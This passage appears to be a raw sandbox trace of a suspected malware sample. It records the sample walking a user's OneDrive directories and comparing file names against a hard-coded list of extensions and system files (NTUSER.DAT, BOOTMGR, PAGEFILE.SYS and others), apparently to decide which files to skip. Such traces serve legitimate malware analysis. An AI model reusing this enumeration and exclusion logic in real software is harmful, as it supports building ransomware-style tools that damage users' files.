lpString2="ADMX", cchCount2=4) returned 3 [0100.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ADMX", cchCount2=4) returned 3 [0100.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ADMX", cchCount2=4) returned 3 [0100.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="ADMX", cchCount2=4) returned 3 [0100.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="ADMX", cchCount2=4) returned 3 [0100.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="ADMX", cchCount2=4) returned 3 [0100.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="ADMX", cchCount2=4) returned 3 [0100.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="ADMX", cchCount2=4) returned 3 [0100.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="ADMX", cchCount2=4) returned 3 [0100.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="ADMX", cchCount2=4) returned 3 [0100.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="ADMX", cchCount2=4) returned 3 [0100.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="ADMX", cchCount2=4) returned 3 [0100.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="ADMX", cchCount2=4) returned 3 [0100.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="ONEDRIVE.ADMX", cchCount2=13) returned 1 [0100.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="ONEDRIVE.ADMX", cchCount2=13) returned 1 [0100.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="ONEDRIVE.ADMX", cchCount2=13) returned 1 [0100.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="ONEDRIVE.ADMX", cchCount2=13) returned 1 [0100.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="ONEDRIVE.ADMX", cchCount2=13) returned 1 [0100.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="ONEDRIVE.ADMX", cchCount2=13) returned 1 [0100.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="ONEDRIVE.ADMX", cchCount2=13) returned 3 [0100.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="ONEDRIVE.ADMX", cchCount2=13) returned 1 [0100.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="ONEDRIVE.ADMX", cchCount2=13) returned 1 [0100.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="ONEDRIVE.ADMX", cchCount2=13) returned 1 [0100.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="ONEDRIVE.ADMX", cchCount2=13) returned 3 [0100.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="ONEDRIVE.ADMX", cchCount2=13) returned 1 [0100.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="ONEDRIVE.ADMX", cchCount2=13) returned 3 [0100.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="ONEDRIVE.ADMX", cchCount2=13) returned 3 [0100.297] FindNextFileW (in: hFindFile=0x2cfbd8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.297] FindClose (in: hFindFile=0x2cfbd8 | out: hFindFile=0x2cfbd8) returned 1 [0100.298] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.298] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cff18 [0100.307] FindNextFileW (in: hFindFile=0x2cff18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.307] FindNextFileW (in: hFindFile=0x2cff18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="MUI", cchCount2=3) returned 3 [0100.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="MUI", cchCount2=3) returned 3 [0100.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="MUI", cchCount2=3) returned 3 [0100.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.309] FindNextFileW (in: hFindFile=0x2cff18, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.309] FindClose (in: hFindFile=0x2cff18 | out: hFindFile=0x2cff18) returned 1 [0100.310] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0100.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0100.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0100.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0100.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0100.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0100.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0100.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0100.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0100.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0100.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0100.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="PNG", cchCount2=3) returned 3 [0100.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="PNG", cchCount2=3) returned 3 [0100.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="PNG", cchCount2=3) returned 3 [0100.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0100.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0100.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0100.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0100.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="ALERTICON.PNG", cchCount2=13) returned 3 [0100.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="ALERTICON.PNG", cchCount2=13) returned 3 [0100.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="ALERTICON.PNG", cchCount2=13) returned 3 [0100.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="ALERTICON.PNG", cchCount2=13) returned 3 [0100.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="ALERTICON.PNG", cchCount2=13) returned 3 [0100.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="ALERTICON.PNG", cchCount2=13) returned 3 [0100.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="ALERTICON.PNG", cchCount2=13) returned 3 [0100.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="ALERTICON.PNG", cchCount2=13) returned 3 [0100.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="ALERTICON.PNG", cchCount2=13) returned 3 [0100.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="ALERTICON.PNG", cchCount2=13) returned 3 [0100.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="ALERTICON.PNG", cchCount2=13) returned 3 [0100.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="ALERTICON.PNG", cchCount2=13) returned 3 [0100.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="ALERTICON.PNG", cchCount2=13) returned 3 [0100.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="ALERTICON.PNG", cchCount2=13) returned 3 [0100.312] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.312] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\am-et\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfcd8 [0100.312] FindNextFileW (in: hFindFile=0x2cfcd8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.313] FindNextFileW (in: hFindFile=0x2cfcd8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="MUI", cchCount2=3) returned 3 [0100.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="MUI", cchCount2=3) returned 3 [0100.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="MUI", cchCount2=3) returned 3 [0100.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.314] FindNextFileW (in: hFindFile=0x2cfcd8, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.314] FindClose (in: hFindFile=0x2cfcd8 | out: hFindFile=0x2cfcd8) returned 1 [0100.314] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.314] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\amd64\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfa58 [0100.314] FindNextFileW (in: hFindFile=0x2cfa58, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.314] FindNextFileW (in: hFindFile=0x2cfa58, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.314] FindNextFileW (in: hFindFile=0x2cfa58, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.314] FindNextFileW (in: hFindFile=0x2cfa58, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.319] FindNextFileW (in: hFindFile=0x2cfa58, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.319] FindClose (in: hFindFile=0x2cfa58 | out: hFindFile=0x2cfa58) returned 1 [0100.320] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.320] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.320] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.324] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.324] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.324] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.324] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.324] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.324] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.324] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.324] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.324] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.324] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.324] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.324] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.324] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.324] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.324] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.324] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.324] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.333] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.333] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.333] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.333] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.333] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.333] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.333] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.333] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.333] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.333] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.333] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.333] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.333] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.333] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.333] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.333] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.333] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.333] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.334] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.334] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.334] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.334] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.334] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.334] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.334] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.334] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ar\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cf918 [0100.334] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.334] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.335] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.335] FindClose (in: hFindFile=0x2cf918 | out: hFindFile=0x2cf918) returned 1 [0100.335] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.337] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cf898 [0100.349] FindNextFileW (in: hFindFile=0x2cf898, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.349] FindNextFileW (in: hFindFile=0x2cf898, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.349] FindNextFileW (in: hFindFile=0x2cf898, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0100.349] FindClose (in: hFindFile=0x2cf898 | out: hFindFile=0x2cf898) returned 1 [0100.350] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.350] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.350] FindNextFileW (in: hFindFile=0x2cf818, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0100.350] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cfa98 [0100.350] FindNextFileW (in: hFindFile=0x2cfa98, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.351] FindNextFileW (in: hFindFile=0x2cfa98, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0100.351] FindNextFileW (in: hFindFile=0x2cfa98, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 